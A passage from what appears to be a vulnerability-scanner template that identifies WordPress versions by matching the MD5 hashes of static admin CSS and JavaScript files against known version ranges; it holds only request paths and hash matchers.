"(\"efea55c81e3ea0ca09218e8b5f9afb4c\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.16 - dsl: - - "(\"c57388a65dd7ec1756906163092fe189\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"28dd93cd05da310c09f74bc10291e1a4\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"19349d4b01b6274f6acfe22728a11ba9\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"048e675d19df066b8bbef9e3f47b50b5\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"6ace78179d1df3dc9b65b5184338332c\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.2 - dsl: - - "(\"36a7ea65791f3906b1df1a49f5a43d4c\" == md5(body))" - - type: dsl - name: 5.4 - dsl: - - "(\"13741ff4c641e3802162fa03fbd186a0\" == md5(body))" - - type: dsl - name: 5.4.1 - 5.4.4 - dsl: - - "(\"9bf6983d8457015564b150b4940448d5\" == md5(body))" - - type: dsl - name: 5.3.3 - 5.3.6 - dsl: - - "(\"7774dd0c0ffbbabb3f27bf90b63a20cf\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"2d6edb6605a2cb8605fd40f47458410c\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"909a82ec9008629769faa54d9e441da9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/widgets.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"9ecc681f73ca68d4317b51cda7fcf7a6\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"db1fe8e4e2d28b34933170e7651d9c3e\" == md5(body))" - - type: dsl - name: 4.4 - 4.6.20 - dsl: - - "(\"aeab7c0cb90d81f8dde42cf7c0643977\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"071699af2261779b923ed5d35c2906d4\" == md5(body))" - - type: dsl - name: 4.2.3 - 4.2.29 - dsl: - - "(\"2500781d246925eb4f14a6806624b1ba\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.2 - dsl: - - "(\"485de2b76d48a457394827f2f5c5e0fb\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"ab3c6775af462066bdb485407007a49b\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"e83fa02f4e7f2fad6a2908294ef48346\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"8ba30eea17f8edcad409260ad55cb71e\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"2831b769919d5f1425c37982fad9d04a\" == md5(body))" - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"8d63d1b5d33ddb3ce802d4b3101eecb4\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"8bd13d2d038f8a9bbae8b5224f7a6cf7\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"ffe89d1610b9548b2045b8287efc3a45\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"9628e175931f52fa66ba397e185108da\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"9041980e0fcbd9eb534a350ddff07fd9\" == md5(body))" - - type: dsl - name: 2.9 - 3.0.6 - dsl: - - "(\"82eda7c0bf831b87fe258f3627733d62\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"0aabf147505c4f70b2118bf9f2cd441e\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"10cabe6e1dae0d377340a3b0f0702730\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"b37189d5961232b0dbe7dfd19b15f961\" == md5(body))" - - type: dsl - name: 2.5.1 - dsl: - - "(\"2d8e2c042b6c0ea040fa6442e5d10a14\" == md5(body))" - - type: dsl - name: 2.5 - dsl: - - "(\"6e250c8c021b3bda740e2abd0728685a\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.2 - dsl: - - "(\"39011c3ef4e410b2d90154e0f44c6fb2\" == md5(body))" - - type: dsl - name: 4.9.3 - 5.0.11 - dsl: - - "(\"e1b8555dd35d833a4233467e448a83fd\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"1dffc13554c171793366b66ab7abd3a4\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"d05ceec8b792484151ce78b2728ef8e8\" == md5(body))" - - type: dsl - name: 5.5 - dsl: - - "(\"e80a8800b4ffda0aa8ba31b72e88d32f\" == md5(body))" - - type: dsl - name: 5.5.1 - 5.5.3 - dsl: - - "(\"8668b09107e802713e02f84e800a37b3\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"be60da41523426c0dda3214ea82e2e0d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/wp-emoji-loader.js" - matchers: - - type: dsl - name: 4.8.2 - 4.8.15 - dsl: - - "(\"3c631f3faee929b38f97cf728a400838\" == md5(body))" - - type: dsl - name: 4.8 - 4.8.1 - dsl: - - "(\"c2da74cc961f02f8a1532b9ef4c49f6f\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"1e34797cb4169e053e6d526294921d66\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"1e775e7c758584bd7af7f718d09eec96\" == md5(body))" - - type: dsl - name: 4.5.1 - 4.5.23 - dsl: - - "(\"2d2731b03615ee79144b9259d94a2e1d\" == md5(body))" - - type: dsl - name: 4.5 - dsl: - - "(\"4cac17278a207c14a58648c92b24e146\" == md5(body))" - - type: dsl - name: 4.4.3 - 4.4.24 - dsl: - - "(\"bc114c7b2bdddff03241f50f112cec68\" == md5(body))" - - type: dsl - name: 4.4.2 - dsl: - - "(\"59250ea877230734339b12588fb56929\" == md5(body))" - - type: dsl - name: 4.4.1 - dsl: - - "(\"248977111a79cdb3aed53f8262e3c7da\" == md5(body))" - - type: dsl - name: 4.4 - dsl: - - "(\"355049f99f0565be72e7a2b4dcfd5e5e\" == md5(body))" - - type: dsl - name: 4.2.2 - 4.3.25 - dsl: - - "(\"d4a819f73ff1a4574a969c9e46d6f117\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.1 - dsl: - - "(\"91852c46e229354898fcffb83eef84c9\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.2 - dsl: - - "(\"961d47e473a86475973713a54741fd33\" == md5(body))" - - type: dsl - name: 4.9.3 - 4.9.7 - dsl: - - "(\"2b204cc941a4670d627f549de9293d29\" == md5(body))" - - type: dsl - name: 4.9.8 - 5.0.11 - dsl: - - "(\"67225f16229b76c9f2a0c46a15182781\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"04696b6a36a295a5deaea186bb9afb6a\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"0712b4b1e4761d9b32654d905e41a2e9\" == md5(body))" - - type: dsl - name: 5.3 - 5.4.4 - dsl: - - "(\"fe59084e6bc4be1624a6d93df4e63e17\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"90686eda3165dfdae88396b016ff53c5\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/login.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"cabe11a63f5be3fb81358c6680a842ca\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"5986a1680538ac8e83d217027d57543f\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"09850183c273d5d1281938b35481e499\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"3e0522fdb4c11550a7466636acf5bb89\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"634f61086f99bacf674ec35b13a59d04\" == md5(body))" - - type: dsl - name: 4.3.1 - 4.3.25 - dsl: - - "(\"72708014eb3072db16d015b5cb73b514\" == md5(body))" - - type: dsl - name: 4.3 - dsl: - - "(\"42a6a3be4f2f11208a281be9be203427\" == md5(body))" - - type: dsl - name: 4.2.3 - 4.2.29 - dsl: - - "(\"18cf2d8b6ef368cc26596b0a630142b5\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.2 - dsl: - - "(\"c4661abb4164f292618baa46c3b04235\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"957349ba7cfc37f34ba6754dd351eb1b\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"15c63a1f8a16d4ca851ee2f0ef50b976\" == md5(body))" - - type: dsl - name: 3.9.1 - 3.9.33 - dsl: - - "(\"7f8ecaf975c90333afdbfbb467d7117c\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"eb6244e98261b7eca06d8d11cc9f28bf\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.4 - dsl: - - "(\"1a0d15022c26abdfdb9448118662a825\" == md5(body))" - - type: dsl - name: 4.9.5 - dsl: - - "(\"af1bc6adf17f10ad34c9a0bd4c354df9\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.16 - dsl: - - "(\"0433cc6b4967a15d2f6be5a92958b812\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"4fbee54e4f5824b05f1269c562d1f860\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"85e7a165ac57ff9ef61a1886f3d50593\" == md5(body))" - - type: dsl - name: 5.2 - dsl: - - "(\"1e357122810800c44d1cbff5fda7747b\" == md5(body))" - - type: dsl - name: 5.2.1 - 5.2.2 - dsl: - - "(\"f1651f06c741f9e429b84160be377ad9\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"95b81581a1a6a3dda3eb13deedb1545e\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"b0716f9ea0eb89a8037d01d61819d295\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"50da1f79474549fd0de7c53e98d20a80\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"97785d9b8c2eeb9a40dd241db6519b92\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/login-rtl.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"beb63bfdeb079748fc7e56ee7a01a824\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"2730e933c7a1a342a216a88b59090922\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"638da3bea5a7c1f2b42c3f277cea9846\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"0e5a2cd27f0c4117a5fdf616427a7b76\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"a083c62aeb2d3093855dcc92edb5a44c\" == md5(body))" - - type: dsl - name: 4.3.1 - 4.3.25 - dsl: - - "(\"1456ea18b6e704b2de23e24e9f01b905\" == md5(body))" - - type: dsl - name: 4.3 - dsl: - - "(\"c25af084f22564159483a93fa3b1bd76\" == md5(body))" - - type: dsl - name: 4.2.3 - 4.2.29 - dsl: - - "(\"d2dbe8659e647d0a7081d7d73f18cbf7\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.2 - dsl: - - "(\"563cb2edac2f1e28bc7ba07afcdda851\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"bd502c39f6ac66dd8fc14fc6c47d47c6\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"687e07c713318834113a53841a9b8b4f\" == md5(body))" - - type: dsl - name: 3.9.1 - 3.9.33 - dsl: - - "(\"f0a8b87f786d638f35e74140aa3cff40\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"5f54285e40c9b21d507d2260a2420f47\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.4 - dsl: - - "(\"478fe30c12de9ce895d96b3d0d3bbef9\" == md5(body))" - - type: dsl - name: 4.9.5 - dsl: - - "(\"57dafb76bdabe1eab5512ab4832c8f40\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.16 - dsl: - - "(\"861b3448d69e1432e1e87fa5e6b54fc9\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"fefacd93bdb86714698d998fc0f2a865\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"d6d87061e4402b1fd0c4e821877a40e7\" == md5(body))" - - type: dsl - name: 5.2 - dsl: - - "(\"60938e53731e909ec1a70c20dd2a96ba\" == md5(body))" - - type: dsl - name: 5.2.1 - 5.2.2 - dsl: - - "(\"582bbded66ab92465aa8decc20a51cba\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"da76e3b93f894e5142d14d00d355e6ab\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"395af750c19e5a0bb9f7e5ed5a0f027d\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"3f10279b62e53594c3aac3fb3d73c3c8\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"3c3de85d77d3959f79cb7d4cc6899268\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/wp-emoji-loader.min.js" - matchers: - - type: dsl - name: 4.8.2 - 4.8.15 - dsl: - - "(\"c324a0faeae39356972d91b004b706d4\" == md5(body))" - - type: dsl - name: 4.8 - 4.8.1 - dsl: - - "(\"95ba8d3404ccae2dcb692b5153972260\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"f3ec21904cc0cf5d899f29e35b0b4612\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"cf0f5dd3b133be89352f938de9d5298f\" == md5(body))" - - type: dsl - name: 4.5.1 - 4.5.23 - dsl: - - "(\"e20f82f707fdc28257628f9bc67c0430\" == md5(body))" - - type: dsl - name: 4.5 - dsl: - - "(\"4499553cf177cb964b0df8c445ebc798\" == md5(body))" - - type: dsl - name: 4.4.3 - 4.4.24 - dsl: - - "(\"d528caab721209ac3e971fd97384379d\" == md5(body))" - - type: dsl - name: 4.4.2 - dsl: - - "(\"2a684c8e10b5294903e28dcd9cac377b\" == md5(body))" - - type: dsl - name: 4.4.1 - dsl: - - "(\"8569719eaedca791a2136e7bad07de29\" == md5(body))" - - type: dsl - name: 4.4 - dsl: - - "(\"05fa167592d86e9c03dc30b4f868c00d\" == md5(body))" - - type: dsl - name: 4.2.2 - 4.3.25 - dsl: - - "(\"26ce699f92d7bd2d7dee5ff0827b296c\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.1 - dsl: - - "(\"5df203c872d3bfe2045aa8dc4370b9fd\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.2 - dsl: - - "(\"dffc41c697f23eba1915fc204dee2aa9\" == md5(body))" - - type: dsl - name: 4.9.3 - 4.9.7 - dsl: - - "(\"a0ee12a57e464358e104e53446261174\" == md5(body))" - - type: dsl - name: 4.9.8 - 5.1.8 - dsl: - - "(\"0ac3cd92fe3f0052da47e55c729df482\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"3f3c006ec5abc419c38a50107e3854cd\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"7000dea726f734ed07227e6f1abebb13\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"e83c87ec3e7c36b6f412d653e4207855\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"0f34fce4c0d019378b3976a898efb1e9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/widgets-rtl.css" - matchers: - - type: dsl - name: 4.8.1 - 4.8.15 - dsl: - - "(\"9858424b442617bafdea74c56346b848\" == md5(body))" - - type: dsl - name: 4.8 - dsl: - - "(\"11eb0df301b82d5775206d07575f08f9\" == md5(body))" - - type: dsl - name: 4.6 - 4.7.19 - dsl: - - "(\"52222282329f1e2ba87d9df556b9da51\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"ec5b007681f7fd7595c7209efbddf6d9\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"00f91c295803e867d7fb9e0da9f352a5\" == md5(body))" - - type: dsl - name: 4.2.3 - 4.3.25 - dsl: - - "(\"49b9300d93ddad2c4c8c5136062c5200\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.2 - dsl: - - "(\"d81963de7dff71f3295c5a42fba00ab7\" == md5(body))" - - type: dsl - name: 4.0 - 4.1.32 - dsl: - - "(\"497445fdaced3a3f74ad9a252e2b95b6\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"bc797ee5fe57916b0191489d31592f2a\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"c94cb7b706d93a2575ce4bb127ce4967\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"b518ff869f6ee3a90b8a87bdee462390\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"3ffd8e2288fc6b29d2e2bec4f1770f4f\" == md5(body))" - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"c72b211f292a7ac48348b3aa47e8f9c1\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"f0799da338bb863983d5f9e0ca53f7ef\" == md5(body))" - - type: dsl - name: 2.6.1 - 2.6.5 - dsl: - - "(\"70b40c8490427ad3fc0d881e0c9995a9\" == md5(body))" - - type: dsl - name: 2.6 - dsl: - - "(\"a1a32a9b498dfa02859b1d03600b6668\" == md5(body))" - - type: dsl - name: 2.5.1 - dsl: - - "(\"5fd9135577a36d561dea45d8845fd9dd\" == md5(body))" - - type: dsl - name: 2.5 - dsl: - - "(\"cd137a3d74d868ba4bd25fe64b33892d\" == md5(body))" - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"f464200516b71362dfd560b393ada0a0\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.2 - dsl: - - "(\"3657c79999ecaf34843cb01503d6e727\" == md5(body))" - - type: dsl - name: 4.9.3 - 4.9.16 - dsl: - - "(\"7d4210bb7278ef9bae8b79a3c726a2bc\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"461cdf628f771b69a60dd1ba4ba4c3dd\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"f08940c0db2d4007baf254e8be1f1b51\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"a8a5b2c135c5a742e935eeb74f548ed1\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"f25c3ac1e8dc5a2134ba7fec573451be\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"01c2b3122f71d10f82d763808fd477f2\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"70f3f7e0b829eef6cf200786ae55ce6f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/install.css" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"b5aac84283aa7183c30a25527edd3152\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"8a6f5d94ad68066f64975eb24914dea7\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"41c0a53f9562353c00b517bf9f76bbad\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"985f4c5f6567fa568c0dd17084f34e31\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"96f0b4f48fed4e062afe2b7fc7d0d890\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"42c906bd2400b2ab11aa44a8f8396a9e\" == md5(body))" - - type: dsl - name: 4.0 - 4.1.32 - dsl: - - "(\"acea8fff302212325749ca45805add61\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"f4c61ba2aa0c5cd92473ec2b965df108\" == md5(body))" - - type: dsl - name: 3.8.1 - 3.8.35 - dsl: - - "(\"ffc68bc4eeaa6006b6bcb476cc751c43\" == md5(body))" - - type: dsl - name: 3.8 - dsl: - - "(\"ef980e36248c52fdf84395bb16fed6c1\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"b5a5602923179daa9c75b75e47fd1174\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"8142a20be96cb3dc322e2cd45ec76c0b\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"243359672a1fa89898c942b8d3ae40b2\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"cc99856d0a90f9996ab7683e9d7a1631\" == md5(body))" - - type: dsl - name: 3.2.1 - dsl: - - "(\"e4b5f221205f4075192a67ba25b1dd47\" == md5(body))" - - type: dsl - name: 3.2 - dsl: - - "(\"eb5a90b48f19ecb9a88c0a9254b7af32\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"c4bc56d94f759616b98ec1b3addac4f5\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"cbc0530c7320ad1a70162fef6a74a9aa\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"8409978ebacfbbdd67f280777e42e253\" == md5(body))" - - type: dsl - name: 2.7 - 2.8.6 - dsl: - - "(\"0380e33272aa60d16b2e7d405e7288a8\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"a72d6e3d327047add3066c9e96ce5d1f\" == md5(body))" - - type: dsl - name: 2.5 - 2.5.1 - dsl: - - "(\"ad6dfaa24e36fa416d119ee6bf38cf69\" == md5(body))" - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"234fed47c9eef92ca35985d459a99dbf\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"32d34c1ae9e1b6303fb0b846991d308b\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"1a4a323cf79d38c6061b15766f1a4c01\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.2 - dsl: - - "(\"71fc826c2ef26e9dfd4c0ff7ce0d7e89\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"b1703f90b91e7eb19048ce11e28d5b68\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"4fbbf669661beb6bb4cf847428843b43\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.2 - dsl: - - "(\"b3f922c2f2b9b81de2e5ea5713de5a68\" == md5(body))" - - type: dsl - name: 5.3.3 - 5.4.4 - dsl: - - "(\"013f2df17e4c93e1b8ad6b3fe66d2a91\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"1e0c637714808ce5696fdf07ac84405e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/plugin.min.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"fede2d004deec3d7c15459a56bd40a21\" == md5(body))" - - type: dsl - name: 4.7.3 - 4.7.19 - dsl: - - "(\"4a2d07ee67ffb1c5b76b2ac486216057\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.2 - dsl: - - "(\"eaa208851b66085620779cbf3d30fefb\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"3b46a42ebcdf945ff176ce64d7f56668\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"062b51bf3dd5b46eac81fec6b9929559\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"75b114a2b3864eea8534a8b2ff5b66c9\" == md5(body))" - - type: dsl - name: 4.3.1 - 4.3.25 - dsl: - - "(\"aa3dc74f38e3be71febb90a89d2166a8\" == md5(body))" - - type: dsl - name: 4.3 - dsl: - - "(\"94bb3edac4f1fa30c3f25a79251b53d4\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"9f95f44ac2be559e61e0c16795bbc10e\" == md5(body))" - - type: dsl - name: 4.1.1 - 4.1.32 - dsl: - - "(\"5b122550eec0c22e85083aab44c80b18\" == md5(body))" - - type: dsl - name: 4.1 - dsl: - - "(\"97ed56381413cfaf6d52dd5cb79b3e94\" == md5(body))" - - type: dsl - name: 4.0.1 - 4.0.32 - dsl: - - "(\"f8fc964418d9705e139c934fa0af865e\" == md5(body))" - - type: dsl - name: 4.0 - dsl: - - "(\"fd13d574bf148d9410d3a3d5554e8d1c\" == md5(body))" - - type: dsl - name: 3.9.3 - 3.9.33 - dsl: - - "(\"b516391ad678c1905d10cddd1e8f6f79\" == md5(body))" - - type: dsl - name: 3.9.1 - 3.9.2 - dsl: - - "(\"0183b86a9564cd298914ccf108e77342\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"9404e45d965fd7625704430c3cee6e51\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.7 - dsl: - - "(\"c048cf6c4dbaaf122fbcad50bbb91eda\" == md5(body))" - - type: dsl - name: 4.9.8 - 5.0.11 - dsl: - - "(\"55079e203fbb8913c2f34bd839f9a6dd\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"98484c4d2af4382680965d96053a78d4\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"7c46e095db079326a9bf66aa5a05f8a4\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/quicktags.js" - matchers: - - type: dsl - name: 1.5.1.1 - 1.5.2 - dsl: - - "(\"113197978798c0416584b2f8520b07a7\" == md5(body))" - - type: dsl - name: 1.5.1 - dsl: - - "(\"3081c635f5f5aa2394d8329cbf0a9346\" == md5(body))" - - type: dsl - name: 1.5-strayhorn - dsl: - - "(\"e9cfc5831a5db27731be236ede39c9b5\" == md5(body))" - - type: dsl - name: 1.2-mingus - 1.2.2 - dsl: - - "(\"0a12c9570a5df5e6878dbdb0fa8c9f71\" == md5(body))" - - type: dsl - name: 1.2.1 - dsl: - - "(\"b60c22b11fb52febf809b1aea7fc463b\" == md5(body))" - - type: dsl - name: 1.2-delta - dsl: - - "(\"dd3f50ec1b6f1c60d0c8cf487584ac80\" == md5(body))" - - type: dsl - name: 1.0-platinum - 1.0.2 - dsl: - - "(\"cacc30e78056fcd0b2a55c3d4add02f3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/global.css" - matchers: - - type: dsl - name: 3.2.1 - dsl: - - "(\"6cd0d6c4c32fc3f379668f3754180ff5\" == md5(body))" - - type: dsl - name: 3.2 - dsl: - - "(\"d056ab8b13e3c4221ed4db6fae71dd9b\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"57e3e4cbc2a8f5c8879e04e2fb10c165\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"f70eb26c5ca7f7c0627de3a5b88d999b\" == md5(body))" - - type: dsl - name: 2.9.1 - 2.9.2 - dsl: - - "(\"c65e7d9d4efb1cb319378608ac0af681\" == md5(body))" - - type: dsl - name: 2.9 - dsl: - - "(\"bc834ff6c4039a8ffa7d623e63406d0c\" == md5(body))" - - type: dsl - name: 2.8.1 - 2.8.6 - dsl: - - "(\"5ec06085a2ae7d41dcfcc9f48701caaf\" == md5(body))" - - type: dsl - name: 2.8 - dsl: - - "(\"ccafab6b8bc45a0add424be63085ccbc\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"81edc89f673eda2069e9e5f66c54f4af\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"6e0f4cca3aca085d28cbc6cb13777a18\" == md5(body))" - - type: dsl - name: 2.5 - 2.5.1 - dsl: - - "(\"8d490e27b9916d9d2520e72075333109\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/wp-admin.min.css" - matchers: - - type: dsl - name: 4.5 - 4.8.15 - dsl: - - "(\"a2e2f67626ed6f9beca5306c1a16abba\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"1ac33574bd35da1e4cf9e66d2d173686\" == md5(body))" - - type: dsl - name: 4.3.1 - 4.3.25 - dsl: - - "(\"0b9fe6899f34daa1a46f71466cc73f8b\" == md5(body))" - - type: dsl - name: 4.3 - dsl: - - "(\"19084332c355439f6d42ebc0f0e78ebd\" == md5(body))" - - type: dsl - name: 4.2.3 - 4.2.29 - dsl: - - "(\"6e7ba89ab7be7faca4bd6e96498af536\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.2 - dsl: - - "(\"225d1ef58b5ab0f793d3952967df269a\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"2984023919bf18888432e7459d70bf00\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"fceeca9707faf124a462d8e11a9bfb50\" == md5(body))" - - type: dsl - name: 3.9.1 - 